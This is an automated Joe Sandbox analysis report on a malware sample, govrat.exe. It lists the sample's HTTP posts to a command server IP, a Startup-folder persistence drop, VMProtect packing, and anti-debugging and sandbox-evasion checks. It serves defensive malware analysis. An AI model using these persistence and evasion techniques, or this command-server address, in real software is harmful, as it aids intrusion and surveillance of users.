Analysis Report

Overview

General Information

Joe Sandbox Version:	21.0.0
Analysis ID:	50649
Start time:	22:25:38
Joe Sandbox Product:	Cloud
Start date:	19.03.2018
Overall analysis duration:	0h 14m 45s
Hypervisor based Inspection enabled:	true
Report type:	full
Sample file name:	govrat.exe
Cookbook file name:	default.jbs
Analysis system description:	W7x64 Native with HVM (patch level Feb 2018, Office 2016, Java 1.8.0_161, Flash 28, Acrobat Reader DC 18, Internet Explorer 11, Chrome 64, Firefox 58)
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled GSI enabled (VBA) GSI enabled (Javascript)
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal56.evad.winEXE@5/2@0/1
HCA Information:	Failed
EGA Information:	Successful, ratio: 100%
Cookbook Comments:	Adjust boot time Correcting counters for adjusted boot time Adjusted system time to: 10/10/2017 Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): mscorsvw.exe, WmiPrvSE.exe, sppsvc.exe, devmonsrv.exe, mediasrv.exe, jhi_service.exe, IntelMeFWService.exe, obexsrv.exe, LMS.exe, dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	56	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Signature Overview

Click to jump to signature section

Networking:

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic	HTTP traffic detected: POST /index.html HTTP/1.1Connection: Keep-AliveContent-Type: application/octet-streamAccept: /User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36Content-Length: 440Host: 192.243.101.124
Source: global traffic	HTTP traffic detected: POST /index.html HTTP/1.1Connection: Keep-AliveContent-Type: application/octet-streamAccept: /User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36Content-Length: 32Host: 192.243.101.124

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: POST /index.html HTTP/1.1Connection: Keep-AliveContent-Type: application/octet-streamAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36Content-Length: 440Host: 192.243.101.124

Urls found in memory or binary data

Show sources

Source: explorer.exe	String found in binary or memory: file:///C:/Users/user/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/ASC.exellQ
Source: explorer.exe	String found in binary or memory: file:///C:/Users/user/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/ASC.exewlP
Source: explorer.exe	String found in binary or memory: file:///C:/Users/user/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/ASC.exeznX
Source: govrat.exe	String found in binary or memory: http://%S
Source: govrat.exe	String found in binary or memory: http://192.243.101.124/index.html
Source: govrat.exe	String found in binary or memory: http://192.243.101.124/index.htmlZZ)
Source: govrat.exe	String found in binary or memory: http://192.243.101.124e:
Source: govrat.exe, ASC.exe.1.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: govrat.exe, ASC.exe.1.dr	String found in binary or memory: http://t2.symcb.com0
Source: govrat.exe, ASC.exe.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: govrat.exe, ASC.exe.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: govrat.exe, ASC.exe.1.dr	String found in binary or memory: http://tl.symcd.com0&
Source: explorer.exe	String found in binary or memory: http://www.%s.comPA
Source: govrat.exe, ASC.exe.1.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: govrat.exe, ASC.exe.1.dr	String found in binary or memory: https://www.thawte.com/repository0W

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Users\user\Desktop\govrat.exe

File created: C:\Users\user\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ASC.exe

Jump to dropped file

Data Obfuscation:

Sample is protected by VMProtect

Show sources

Source: govrat.exe	Static PE information: Section: .vmp1 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: ASC.exe.1.dr	Static PE information: Section: .vmp1 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Entry point lies outside standard sections

Show sources

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp1

PE file contains sections with non-standard names

Show sources

Source: govrat.exe	Static PE information: section name: .vmp0
Source: govrat.exe	Static PE information: section name: .vmp1
Source: ASC.exe.1.dr	Static PE information: section name: .vmp0
Source: ASC.exe.1.dr	Static PE information: section name: .vmp1

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0098C272 push edi; ret	1_2_00A13AA9
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_009793A1 push edi; ret	1_2_009793AD
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0097B969 push edi; ret	1_2_0097B96A
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_00985056 push edi; ret	1_2_009D5A71
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0098B0D1 push edi; ret	1_2_009D404F
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_00988D9E push edi; ret	1_2_00988D9F
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0097D79A push edi; ret	1_2_00A168D4
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0097D711 push edi; ret	1_2_00A0B8EA
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_009805CE push edi; ret	1_2_009805E4
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_009802DE push edi; ret	1_2_009A0EEB
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_00977DA3 push edi; ret	1_2_009CDFD4
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_009852AF push edi; ret	1_2_009852B0
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_009814F4 push edi; ret	1_2_009DBD75
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0097B278 push edi; ret	1_2_009B9A2F
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_009580A5 push ecx; ret	1_2_009580B8
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0098B5E4 push edi; ret	1_2_009BF3FE
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0097A9B7 push edi; ret	1_2_0097A9B8
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0097AC17 push edi; ret	1_2_009B4D65
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0098AE5D push edi; ret	1_2_009DAA7F
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0097E453 push edi; ret	1_2_009BD6B9
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0097FD03 push edi; ret	1_2_0097FD04
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_00978BE0 push edi; ret	1_2_009B02B9
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_00985D50 push edi; ret	1_2_00985D6B
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_00984432 push edi; ret	1_2_009C3C86
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_00979733 push edi; ret	1_2_009AF6C2
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0098360A push edi; ret	1_2_009F21C4
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0098C32A push edi; ret	1_2_009F7EA7
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0097808D push edi; ret	1_2_009EA573
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0097C3A0 push edi; ret	1_2_0097C3A1
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0097A11B push edi; ret	1_2_0097A11C
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_00986FCD push edi; ret	1_2_00986FCE

Binary may include packed or encrypted code

Show sources

Source: initial sample	Static PE information: section name: .vmp1 entropy: 7.94598915032
Source: initial sample	Static PE information: section name: .vmp1 entropy: 7.94598915032

Spreading:

Enumerates the file system

Show sources

Source: C:\Users\user\Desktop\govrat.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\govrat.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\govrat.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\govrat.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\govrat.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\govrat.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_00960762 GetProcAddress,GetProcAddress,FindFirstFileA,GetProcAddress,		1_2_00960762
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Code function: 5_2_012D0762 GetProcAddress,GetProcAddress,FindFirstFileA,GetProcAddress,		5_2_012D0762

System Summary:

Detected Hacking Team Remote Control System (RCS) spyware

Show sources

Source: C:\Users\user\Desktop\govrat.exe

Code function: 1_2_0095FE2E GetProcAddress,GetProcAddress,GetProcAddress,K32EnumDeviceDrivers,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,__wcsicoll,

1_2_0095FE2E

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Show sources

Source: C:\Users\user\Desktop\govrat.exe	Memory allocated: 772C0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\govrat.exe	Memory allocated: 771C0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 772C0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 771C0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Memory allocated: 772C0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Memory allocated: 771C0000 page execute and read and write	Jump to behavior

Detected potential crypto function

Show sources

Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_009641C3	1_2_009641C3
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_00966000	1_2_00966000
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_00956502	1_2_00956502
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0095FB7F	1_2_0095FB7F
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0096A780	1_2_0096A780
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0096AE5C	1_2_0096AE5C
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_00966EED	1_2_00966EED
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0096A22F	1_2_0096A22F
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_0096BB94	1_2_0096BB94
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_00969CDE	1_2_00969CDE
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_00967EA6	1_2_00967EA6
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_1_00AC01CE	1_1_00AC01CE
Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_1_00ABFE67	1_1_00ABFE67
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Code function: 5_2_012DBB94	5_2_012DBB94
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Code function: 5_2_012D41C3	5_2_012D41C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Code function: 5_2_012D7EA6	5_2_012D7EA6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Code function: 5_2_012DA780	5_2_012DA780
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Code function: 5_2_012D9CDE	5_2_012D9CDE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Code function: 5_2_012D6000	5_2_012D6000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Code function: 5_2_012C6502	5_2_012C6502
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Code function: 5_2_012CFB7F	5_2_012CFB7F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Code function: 5_2_012DA22F	5_2_012DA22F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Code function: 5_2_012DAE5C	5_2_012DAE5C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Code function: 5_2_012D6EED	5_2_012D6EED
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Code function: 5_1_014301CE	5_1_014301CE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Code function: 5_1_0142FE67	5_1_0142FE67

PE file contains strange resources

Show sources

Source: govrat.exe	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: ASC.exe.1.dr	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Show sources

Source: govrat.exe	Binary or memory string: OriginalFilenamewow64.dllj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamewow64lg2.dllj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamewow64cpu.dllj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameKernelbasej% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameCSRSS.Exe.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamewinsrv.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameWinInit.exe.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameWINLOGON.EXE.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameuser32j% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameservices.exe.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamelsasrv.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamewshtcpip.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamewship6.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamewshqos.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameAUTHUI.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenametzres.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamesppsvc.exe.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameInput.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameTipTsf.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameSpTip.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameTableTextService.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamegpsvc.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameaero.msstyles.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenametaskcomp.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamespoolsv.exe.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameBFE.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameFirewallAPI.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenametaskhost.exe.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameUSERINIT.EXE.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: originalfilename vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameMSCMS.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamej% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameMsCtfMonitor.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamesnmptrap.exe.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamelmhsvc.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamedwm.exe.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamedhcpcore.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamepeerdistsh.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameNetLogon.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamesstpsvc.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamelocalspl.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamenetmsg.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameFXSRESM.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenametaskeng.exe.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameWsdMon.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamevsstrace.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameWLDAP32.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamenetprofm.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameThemeUI.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameExplorerFrame.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameesrb.dll.muiH vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamexpsrchvw.exe.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamestobject.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamerasdlg.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameAltTab.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamewscui.cpl.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameHCPROVIDERS.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameSearchIndexer.exe.mui@ vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamePNIDUI.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenametquery.dll.mui@ vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamesidebar.EXE.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameMsMpRes.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenametwext.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamempr.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameschedsvc.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameFDResPub.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameFunDisc.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamerpcrt4.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameFDPrint.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameBASEBRD.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameimageres.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameWINMM.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameDocumentPerformanceEvents.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameWerConCpl.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameMSHTML.DLL.MUID vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameSHSVCS.DLL.MUIj% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenametaskmgr.exe.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameSndVolSSO.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenamewin32spl.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameinetpp.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameadvapi32.dll.muij% vs govrat.exe
Source: govrat.exe	Binary or memory string: OriginalFilenameprovsvc.dll.muij% vs govrat.exe

Classification label

Show sources

Source: classification engine

Classification label: mal56.evad.winEXE@5/2@0/1

Contains functionality to check free disk space

Show sources

Source: C:\Users\user\Desktop\govrat.exe

Code function: 1_2_009641C3 GetProcAddress,GetDiskFreeSpaceExW,

1_2_009641C3

Launches a second explorer.exe instance

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Users\user\Desktop\govrat.exe	String freed: SELECT * FROM Win32_Processor	Jump to behavior
Source: C:\Users\user\Desktop\govrat.exe	String freed: SELECT * FROM Win32_Processor	Jump to behavior
Source: C:\Users\user\Desktop\govrat.exe	String freed: SELECT * FROM Win32_Processor	Jump to behavior
Source: C:\Users\user\Desktop\govrat.exe	String freed: SELECT * FROM Win32_Processor	Jump to behavior
Source: C:\Users\user\Desktop\govrat.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Reads ini files

Show sources

Source: C:\Users\user\Desktop\govrat.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Users\user\Desktop\govrat.exe

Key opened: HKEY_USERS\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Show sources

Source: unknown	Process created: C:\Users\user\Desktop\govrat.exe 'C:\Users\user\Desktop\govrat.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\explorer.exe explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe'	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Users\user\Desktop\govrat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3AD05575-8857-4850-9277-11B85BDB8E09}\InProcServer32

Jump to behavior

PE file has a valid certificate

Show sources

Source: govrat.exe

Static PE information: certificate valid

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: govrat.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: wow64win.pdb source: govrat.exe, explorer.exe, ASC.exe
Source:	Binary string: wow64cpu.pdb source: govrat.exe, explorer.exe, ASC.exe
Source:	Binary string: wow64.pdbH source: govrat.exe, explorer.exe, ASC.exe
Source:	Binary string: wow64win.pdbH source: govrat.exe, explorer.exe, ASC.exe
Source:	Binary string: wow64.pdb source: govrat.exe, explorer.exe, ASC.exe

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: ASC.exe	Binary or memory string: Progman
Source: ASC.exe	Binary or memory string: Program Manager
Source: ASC.exe	Binary or memory string: Shell_TrayWnd

Anti Debugging:

Checks for debuggers (devices)

Show sources

Source: C:\Windows\explorer.exe

File opened: C:\Windows\WinSxS\FileMaps\users_user_appdata_roaming_microsoft_windows_start_menu_programs_startup_1a6465368f7d89b6.cdf-ms

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Users\user\Desktop\govrat.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Users\user\Desktop\govrat.exe

Code function: 1_2_00982D1B rdtsc

1_2_00982D1B

Malware Analysis System Evasion:

Found stalling execution ending in API Sleep call

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Stalling execution: Execution stalls by calling Sleep			graph_5-20250
Source: C:\Users\user\Desktop\govrat.exe	Stalling execution: Execution stalls by calling Sleep			graph_1-21009

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Users\user\Desktop\govrat.exe

Code function: 1_2_00982D1B rdtsc

1_2_00982D1B

Contains functionality to enumerate device drivers

Show sources

Source: C:\Users\user\Desktop\govrat.exe	Code function: GetProcAddress,GetProcAddress,GetProcAddress,K32EnumDeviceDrivers,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,__wcsicoll,		1_2_0095FE2E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Code function: GetProcAddress,GetProcAddress,GetProcAddress,K32EnumDeviceDrivers,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,__wcsicoll,		5_2_012CFE2E

Enumerates the file system

Show sources

Source: C:\Users\user\Desktop\govrat.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\govrat.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\govrat.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\govrat.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\govrat.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\govrat.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior

Is looking for software installed on the system

Show sources

Source: C:\Users\user\Desktop\govrat.exe

Registry key enumerated: More than 124 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\SysWOW64\explorer.exe TID: 1216	Thread sleep time: -60000s >= -60000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 3868	Thread sleep time: -60000s >= -60000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3904	Thread sleep time: -60000s >= -60000s	Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\govrat.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\user\Desktop\govrat.exe	Code function: 1_2_00960762 GetProcAddress,GetProcAddress,FindFirstFileA,GetProcAddress,		1_2_00960762
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe	Code function: 5_2_012D0762 GetProcAddress,GetProcAddress,FindFirstFileA,GetProcAddress,		5_2_012D0762

Program exit points

Show sources

